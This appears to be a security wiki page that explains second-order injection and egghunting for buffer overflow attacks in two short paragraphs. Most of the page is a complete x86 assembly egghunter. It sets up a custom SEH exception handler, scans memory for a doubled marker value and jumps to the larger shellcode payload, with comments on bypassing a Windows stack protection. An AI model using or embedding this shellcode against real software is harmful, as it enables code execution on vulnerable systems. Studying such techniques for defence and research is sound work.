Questions about this topic? Sign up to ask in the talk tab.

Second-order-injection attack

From NetSec
Jump to: navigation, search

Second-order-injection Explaned

Second-order injection is typically used when a buffer is too small for a standard shellcode payload. Second-order injection allows for the attacker to place the payload in one input and the actual buffer overflow with a smaller shellcode that will locate the real payload in the buffer.

The Egghunt

The primary purpose of an egghunt is for undersized buffers during a buffer overflow attack are used to find in a second order injection attack. You can look for a specific "marker" in memory if you will for where your shellcode starts, then look for that marker and jump to the code.

<syntaxhighlight lang="asm"> egghunt: jmp startup ; skip the exception handler exception_handler: mov eax, [esp + 0x0c] ; get context arg to EH off the stack lea ebx, [eax + 0x7c] ; load effective addr of context plus 0x7c (124) into ebx ; done to prevent nulls and max_byte_size add ebx, 0x3c ; complete addr from above... add [ebx], 0x07 ; add 7 bytes to eip to skip egg found and jmps to it ; by skipping the ptr is incremented and loop continues mov eax, [esp] ; grab ret from stack store in eax add esp, 0x14 ; bypasses a windows stackprotect, does retn 0x10 push eax ; ret addy goes back on the stack xor eax, eax ; nulled ret startup: mov eax, 0x42904290 ; init eax to the egg to find jmp init_exception_handler_skip init_exception_handler_fwd: jmp init_exception_handler ; obtain absolute addy init_exception_handler_skip: call init_exception_handler_fwd ; call backwards to push the abs. addr of pop ecx onto the stack init_exception_handler: pop ecx ; put the abs addr of this line and put it in ecx. SEH abuse anyone? sub ecx, 0x25 ; calc abs addr of the EH by subbing 0x25 (37) from the addr push esp ; push placeholder to be passed to the SEH push ecx ; push abs addr of init_exception_handler xor ebx, ebx ; nulled not ebx ; makes it 0xffffffff push ebx ; indicate no more exception handlers xor edi, edi ; zero edi, will be offset in fs handler mov fs:[edi], esp ; move the structure for the custom EH into fs[0], makes custom EH. search_loop_begin_pre: search_loop_start: xor ecx, ecx ; ecx will be a counter.. mov cl, 0x2 ; set stuff to be checked by scasd push edi ; preserve current ptr to stack repe scasd ; compare egg to current ptr, make sure egg is found backtoback in memory (nopsled!) jnz search_loop_failed ; keep looping if ZF aint set pop edi ; restore to orig. value jmp edi ; jump to our "egg" (our bigger shellcode) search_loop_failed: pop edi ; restore to orig. value inc edi ; inc it to test next ptr jmp search_loop_start ; start this shit over

</syntaxhighlight>